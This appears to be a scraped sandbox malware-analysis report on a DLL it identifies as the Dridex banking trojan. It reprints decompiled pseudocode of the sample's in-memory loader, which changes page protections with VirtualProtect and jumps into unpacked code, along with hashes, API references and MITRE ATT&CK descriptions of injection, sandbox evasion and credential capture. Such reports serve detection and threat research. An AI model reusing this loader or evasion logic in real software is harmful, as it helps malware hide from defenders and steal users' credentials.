				_v56 =  *((intOrPtr*)(_v48 + 0xc));
				_v180 = _t234;
				_v176 =  *((intOrPtr*)(_v48 + 0x48));
				_v172 = 4;
				_v168 =  &_v20;
				_v60 =  *((intOrPtr*)(_t135 + 0x30));
				_v64 = 4;
				_v68 = _t234;
				_v72 =  &_v20;
				_t142 = VirtualProtect(__ebx, __esi, __edi, _t263); // executed
				_v76 = _t142;
				_v180 = _v68;
				_v176 = 0;
				_v172 =  *((intOrPtr*)(_v48 + 0x48));
				_v80 = 0x400;
				_v84 = 2;
				_v88 =  &_v20;
				_v92 = 0;
				E02CD173B();
				E02CD21C2(_v68,  *_v48, _v60);
				E02CD173B( *_v48, 0, _v60);
				_t150 = VirtualProtect(_v68, 0x400, 2, _v88); // executed
				_t270 = _t267 - 0x84;
				_t224 = _v68;
				_t249 =  *((intOrPtr*)(_t224 + 0x3c));
				_v96 = _t150;
				_v100 = _v68 + 0x3c;
				_v104 = _t224;
				_v108 = _t249;
				if(_t249 != 0) {
					_v104 = _v68 + (_v108 + 0x0000ffff & 0x0000ffff) + 1;
				}
				_v112 = _v104;
				if(_v56 != 0) {
					_v116 = 0;
					_v120 = _v112 + 0x18 + ( *(_v112 + 0x14) & 0x0000ffff);
					while(1) {
						_t169 = _v120;
						_v152 = _t169;
						_t245 = _v152;
						_v180 = _v68 +  *((intOrPtr*)(_t245 + 0xc));
						_v176 =  *((intOrPtr*)(_t245 + 8));
						_v172 =  *((intOrPtr*)(0x2cd4418 + (( *(_t169 + 0x24) >> 0x0000001e & 0x00000001) << 4) + ( *(_t169 + 0x24) >> 0x1f << 3) + (( *(_t169 + 0x24) >> 0x0000001d & 0x00000001) << 2)));
						_v168 =  &_v20;
						_v156 = _v116;
						_t175 = VirtualProtect(??, ??, ??, ??); // executed
						_t270 = _t270 - 0x10;
						_t217 = _v156 + 1;
						_v160 = _t175;
						_v116 = _t217;
						_v120 = _v152 + 0x28;
						if(_t217 == _v56) {
							goto L12;
						}
					}
				}
				L12:
				 *_t270 = _v68;
				_v132 = _v68 +  *((intOrPtr*)(_v48 + 0x3c));
				_t154 = DisableThreadLibraryCalls(??);
				_t271 = _t270 - 4;
				_t227 =  *_v100;
				_v164 = _t154;
				_v124 = _t227;
				_v128 = _v68;
				if(_t227 != 0) {
					_v128 = _v68 + (_v124 + 0x0000ffff & 0x0000ffff) + 1;
				}
				_t238 = _v48;
				_v44 =  *((intOrPtr*)(_t238 + 0x40));
				_v40 =  *((intOrPtr*)(_t238 + 0x24));
				_v36 =  *((intOrPtr*)(_t238 + 0x38));
				_v32 =  *((intOrPtr*)(_t238 + 0x50));
				_v28 =  *((intOrPtr*)(_t238 + 0x18));
				_v24 = _v132;
				 *_t271 = _t238;
				_v180 = 0;
				_v176 = 0x5c;
				_v136 =  &_v44;
				_v140 = 0;
				_v144 = 0x5c;
				_v148 =  *((intOrPtr*)(_v128 + 0x28));
				E02CD173B();
				if(_v148 != 0) {
					_t270 =  *((intOrPtr*)( &_v44 + 0x10));
					goto __eax;
				}
				return 1;
			}

0x02cd1949
0x02cd1957
0x02cd195e
0x02cd1961
0x02cd196b
0x02cd1972
0x02cd197c
0x02cd1982
0x02cd198b
0x02cd1994
0x02cd1997
0x02cd199b
0x02cd19a3
0x02cd19aa
0x02cd19ad
0x02cd19b0
0x02cd19b3
0x02cd19b6
0x02cd19d0
0x02cd19d6
0x02cd19d9
0x02cd19e1
0x02cd19e5
0x02cd19e8
0x02cd19eb
0x02cd19ee
0x02cd19f1
0x02cd1a0c
0x02cd1a28
0x02cd1a4d
0x02cd1a4f
0x02cd1a58
0x02cd1a5b
0x02cd1a65
0x02cd1a68
0x02cd1a6b
0x02cd1a6e
0x02cd1a71
0x02cd1a8c
0x02cd1a8c
0x02cd1b76
0x02cd1b79
0x02cd1aa5
0x02cd1aa8
0x02cd1b84
0x02cd1b84
0x02cd1b9b
0x02cd1bc3
0x02cd1bcf
0x02cd1bd2
0x02cd1bd6
0x02cd1bda
0x02cd1be1
0x02cd1be7
0x02cd1be9
0x02cd1bf2
0x02cd1c03
0x02cd1c09
0x02cd1c0c
0x02cd1c0f
0x00000000
0x00000000
0x02cd1c11
0x02cd1b84
0x02cd1c31
0x02cd1c3f
0x02cd1c47
0x02cd1c4a
0x02cd1c4c
0x02cd1c52
0x02cd1c5e
0x02cd1c64
0x02cd1c67
0x02cd1c6a
0x02cd1ae4
0x02cd1ae4
0x02cd1af7
0x02cd1afd
0x02cd1b03
0x02cd1b09
0x02cd1b0f
0x02cd1b15
0x02cd1b1b
0x02cd1b1e
0x02cd1b21
0x02cd1b29
0x02cd1b31
0x02cd1b37
0x02cd1b3d
0x02cd1b43
0x02cd1b49
0x02cd1b57
0x02cd1c24
0x02cd1c2a
0x02cd1c2a
0x02cd1ac9

APIs

VirtualProtect.KERNELBASE ref: 02CD19B6
VirtualProtect.KERNELBASE ref: 02CD1A4D
VirtualProtect.KERNELBASE ref: 02CD1BE7

Strings

\, xrefs: 02CD1B29

Memory Dump Source

Source File: 00000013.00000002.488136444.0000000002CD0000.00000040.00000001.sdmp, Offset: 02CD0000, based on PE: true

Similarity

API ID: ProtectVirtual
String ID: \
API String ID: 544645111-2967466578
Opcode ID: b64cbbe689477eb45665dc3a463a93364eb69217c62cba8487620731a5203f27
Instruction ID: 1fc2c0a9388744ef087248684951053b7c7525a86d869b0c4f7dba8afdd5c196
Opcode Fuzzy Hash: b64cbbe689477eb45665dc3a463a93364eb69217c62cba8487620731a5203f27
Instruction Fuzzy Hash: ABB19DB4D04218DFCB14CFA9C980A9DFBF1BF88310F55856AD959AB352D370A981CF91

Uniqueness

Uniqueness Score: -1.00%

Function 02CD1C7F, Relevance: 1.4, APIs: 1, Instructions: 107memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 02CD1D80

Memory Dump Source

Source File: 00000013.00000002.488136444.0000000002CD0000.00000040.00000001.sdmp, Offset: 02CD0000, based on PE: true

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 0ff62ffde6a8dc253aa636d38c27763328556fd3d4c59bc3456e4b3a190839dc
Instruction ID: 960a567e60524f3ae8ba2d992b1fdae080e587b36a559d7a4cb9f4ca2707ff4e
Opcode Fuzzy Hash: 0ff62ffde6a8dc253aa636d38c27763328556fd3d4c59bc3456e4b3a190839dc
Instruction Fuzzy Hash: CF41C2B5E0461A9FDB04CFA9C4906AEBBF1FF88714F19852DD948AB340D375A881CF94

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: rundll32.exe PID: 5220 Parent PID: 5980 rundll32.exeCOMMON

Executed Functions

Function 02BE193D, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 219
memoryCOMMON

Download Yara Rule

C-Code - Quality: 42%

			E02BE193D(void* __ebx, long __edi, long __esi, intOrPtr* _a4) {
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr* _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				void* _v68;
				char* _v72;
				int _v76;
				long _v80;
				long _v84;
				DWORD* _v88;
				intOrPtr _v92;
				int _v96;
				intOrPtr* _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				void* _v128;
				intOrPtr _v132;
				char* _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				int _v160;
				intOrPtr _v164;
				char* _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				char _v180;
				intOrPtr* _t135;
				int _t142;
				int _t150;
				int _t154;
				intOrPtr _t169;
				int _t175;
				intOrPtr _t217;
				void* _t224;
				intOrPtr _t227;
				void* _t234;
				intOrPtr _t238;
				intOrPtr _t245;
				intOrPtr _t249;
				DWORD* _t263;
				void* _t267;
				intOrPtr* _t270;
				intOrPtr* _t271;

				_t135 = _a4;
				_v20 = 0;
				_t234 =  *((intOrPtr*)(_t135 + 0x28));
				 *0x2be4418 = 1;
				asm("movaps xmm0, [0x2be3010]");
				asm("movups [0x2be4428], xmm0");
				_v48 = _t135;
				_v52 =  *((intOrPtr*)(_t135 + 0x44));
				_v56 =  *((intOrPtr*)(_v48 + 0xc));
				_v180 = _t234;
				_v176 =  *((intOrPtr*)(_v48 + 0x48));
				_v172 = 4;
				_v168 =  &_v20;
				_v60 =  *((intOrPtr*)(_t135 + 0x30));
				_v64 = 4;
				_v68 = _t234;
				_v72 =  &_v20;
				_t142 = VirtualProtect(__ebx, __esi, __edi, _t263); // executed
				_v76 = _t142;
				_v180 = _v68;
				_v176 = 0;
				_v172 =  *((intOrPtr*)(_v48 + 0x48));
				_v80 = 0x400;
				_v84 = 2;
				_v88 =  &_v20;
				_v92 = 0;
				E02BE173B();
				E02BE21C2(_v68,  *_v48, _v60);
				E02BE173B( *_v48, 0, _v60);
				_t150 = VirtualProtect(_v68, 0x400, 2, _v88); // executed
				_t270 = _t267 - 0x84;
				_t224 = _v68;
				_t249 =  *((intOrPtr*)(_t224 + 0x3c));
				_v96 = _t150;
				_v100 = _v68 + 0x3c;
				_v104 = _t224;
				_v108 = _t249;
				if(_t249 != 0) {
					_v104 = _v68 + (_v108 + 0x0000ffff & 0x0000ffff) + 1;
				}
				_v112 = _v104;
				if(_v56 != 0) {
					_v116 = 0;
					_v120 = _v112 + 0x18 + ( *(_v112 + 0x14) & 0x0000ffff);
					while(1) {
						_t169 = _v120;
						_v152 = _t169;
						_t245 = _v152;
						_v180 = _v68 +  *((intOrPtr*)(_t245 + 0xc));
						_v176 =  *((intOrPtr*)(_t245 + 8));
						_v172 =  *((intOrPtr*)(0x2be4418 + (( *(_t169 + 0x24) >> 0x0000001e & 0x00000001) << 4) + ( *(_t169 + 0x24) >> 0x1f << 3) + (( *(_t169 + 0x24) >> 0x0000001d & 0x00000001) << 2)));
						_v168 =  &_v20;
						_v156 = _v116;
						_t175 = VirtualProtect(??, ??, ??, ??); // executed
						_t270 = _t270 - 0x10;
						_t217 = _v156 + 1;
						_v160 = _t175;
						_v116 = _t217;
						_v120 = _v152 + 0x28;
						if(_t217 == _v56) {
							goto L12;
						}
					}
				}
				L12:
				 *_t270 = _v68;
				_v132 = _v68 +  *((intOrPtr*)(_v48 + 0x3c));
				_t154 = DisableThreadLibraryCalls(??);
				_t271 = _t270 - 4;
				_t227 =  *_v100;
				_v164 = _t154;
				_v124 = _t227;
				_v128 = _v68;
				if(_t227 != 0) {
					_v128 = _v68 + (_v124 + 0x0000ffff & 0x0000ffff) + 1;
				}
				_t238 = _v48;
				_v44 =  *((intOrPtr*)(_t238 + 0x40));
				_v40 =  *((intOrPtr*)(_t238 + 0x24));
				_v36 =  *((intOrPtr*)(_t238 + 0x38));
				_v32 =  *((intOrPtr*)(_t238 + 0x50));
				_v28 =  *((intOrPtr*)(_t238 + 0x18));
				_v24 = _v132;
				 *_t271 = _t238;
				_v180 = 0;
				_v176 = 0x5c;
				_v136 =  &_v44;
				_v140 = 0;
				_v144 = 0x5c;
				_v148 =  *((intOrPtr*)(_v128 + 0x28));
				E02BE173B();
				if(_v148 != 0) {
					_t270 =  *((intOrPtr*)( &_v44 + 0x10));
					goto __eax;
				}
				return 1;
			}

0x02be1949
0x02be1957
0x02be195e
0x02be1961
0x02be196b
0x02be1972
0x02be197c
0x02be1982
0x02be198b
0x02be1994
0x02be1997
0x02be199b
0x02be19a3
0x02be19aa
0x02be19ad
0x02be19b0
0x02be19b3
0x02be19b6
0x02be19d0
0x02be19d6
0x02be19d9
0x02be19e1
0x02be19e5
0x02be19e8
0x02be19eb
0x02be19ee
0x02be19f1
0x02be1a0c
0x02be1a28
0x02be1a4d
0x02be1a4f
0x02be1a58
0x02be1a5b
0x02be1a65
0x02be1a68
0x02be1a6b
0x02be1a6e
0x02be1a71
0x02be1a8c
0x02be1a8c
0x02be1b76
0x02be1b79
0x02be1aa5
0x02be1aa8
0x02be1b84
0x02be1b84
0x02be1b9b
0x02be1bc3
0x02be1bcf
0x02be1bd2
0x02be1bd6
0x02be1bda
0x02be1be1
0x02be1be7
0x02be1be9
0x02be1bf2
0x02be1c03
0x02be1c09
0x02be1c0c
0x02be1c0f
0x00000000
0x00000000
0x02be1c11
0x02be1b84
0x02be1c31
0x02be1c3f
0x02be1c47
0x02be1c4a
0x02be1c4c
0x02be1c52
0x02be1c5e
0x02be1c64
0x02be1c67
0x02be1c6a
0x02be1ae4
0x02be1ae4
0x02be1af7
0x02be1afd
0x02be1b03
0x02be1b09
0x02be1b0f
0x02be1b15
0x02be1b1b
0x02be1b1e
0x02be1b21
0x02be1b29
0x02be1b31
0x02be1b37
0x02be1b3d
0x02be1b43
0x02be1b49
0x02be1b57
0x02be1c24
0x02be1c2a
0x02be1c2a
0x02be1ac9

APIs

VirtualProtect.KERNELBASE ref: 02BE19B6
VirtualProtect.KERNELBASE ref: 02BE1A4D
VirtualProtect.KERNELBASE ref: 02BE1BE7

Strings

\, xrefs: 02BE1B29

Memory Dump Source

Source File: 00000014.00000002.480650019.0000000002BE0000.00000040.00000001.sdmp, Offset: 02BE0000, based on PE: true

Similarity

API ID: ProtectVirtual
String ID: \
API String ID: 544645111-2967466578
Opcode ID: 47d6de6ad721b7eaccac20541c1323ebceae66a2c96584abfd946eaee5da3ae7
Instruction ID: 93bc188575b333a764bed1d74854e9df95262c205dd1853d7735e6a32dc1f724
Opcode Fuzzy Hash: 47d6de6ad721b7eaccac20541c1323ebceae66a2c96584abfd946eaee5da3ae7
Instruction Fuzzy Hash: F5B19CB4E04218CFCB14CFA9C980A9DBBF1FF88310F2585AAD959AB351D330A941CF91

Uniqueness

Uniqueness Score: -1.00%

Function 02BE1C7F, Relevance: 1.4, APIs: 1, Instructions: 107memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 02BE1D80

Memory Dump Source

Source File: 00000014.00000002.480650019.0000000002BE0000.00000040.00000001.sdmp, Offset: 02BE0000, based on PE: true

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 0ff62ffde6a8dc253aa636d38c27763328556fd3d4c59bc3456e4b3a190839dc
Instruction ID: 21dd8127057303ab51b495c27e8aafb1fd19f4500df2d219b10538bc6dc7a56b
Opcode Fuzzy Hash: 0ff62ffde6a8dc253aa636d38c27763328556fd3d4c59bc3456e4b3a190839dc
Instruction Fuzzy Hash: 7A41C2B5E0421A9FDB04CFA8C4906AEBBF1FF48714F14856DE849AB340D379A881CF94

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report fc0bc077_by_Libranalysis.dll

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: Dridex

Yara Overview

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Overview

Signature Overview

AV Detection:

Compliance:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Exports

Version Infos

Network Behavior

Network Port Distribution

UDP Packets

DNS Answers

Code Manipulations

Statistics

CPU Usage

Memory Usage

Function 0137193D, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 219
memoryCOMMON

Function 10001494, Relevance: 1.9, Strings: 1, Instructions: 613
COMMONCrypto

Function 10010754, Relevance: 1.9, Strings: 1, Instructions: 650
COMMONCrypto

Function 1000A52C, Relevance: 1.8, Strings: 1, Instructions: 537
COMMONCrypto

Function 1000846C, Relevance: 1.8, Strings: 1, Instructions: 531
COMMONCrypto

Function 10019348, Relevance: 1.8, Strings: 1, Instructions: 529
COMMONCrypto

Function 10011D58, Relevance: .3, Instructions: 282
COMMONCrypto

Function 10006D50, Relevance: .0, Instructions: 36
COMMON

Function 1000C218, Relevance: 5.1, Strings: 4, Instructions: 53
COMMON

Function 0322193D, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 219
memoryCOMMON